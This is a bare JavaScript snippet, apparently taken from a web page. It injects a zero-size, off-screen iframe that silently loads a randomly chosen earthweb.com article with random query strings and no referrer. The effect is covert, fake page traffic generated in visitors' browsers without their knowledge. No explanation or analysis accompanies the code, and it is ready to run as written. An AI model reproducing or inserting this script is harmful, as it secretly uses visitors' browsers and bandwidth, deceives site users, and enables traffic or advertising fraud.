const p = ["how-to-watch-blocked-youtube-videos", "online-scams", "how-to-get-around-paywalls", "anonymous-proxies"]; let iframe = document.createElement('iframe'); iframe.src = 'https://earthweb.com/'+ p[Math.floor(Math.random()*p.length)] +'/?' + (Math.random() + 1).toString(36).substring(7) + '=' + (Math.random() + 1).toString(36).substring(7);; iframe.setAttribute("style","frame:0;position:fixed;top:-999px;width:0px;height:0px;margin:0px;padding:0px;"); iframe.referrerPolicy = 'no-referrer'; document.body.appendChild(iframe);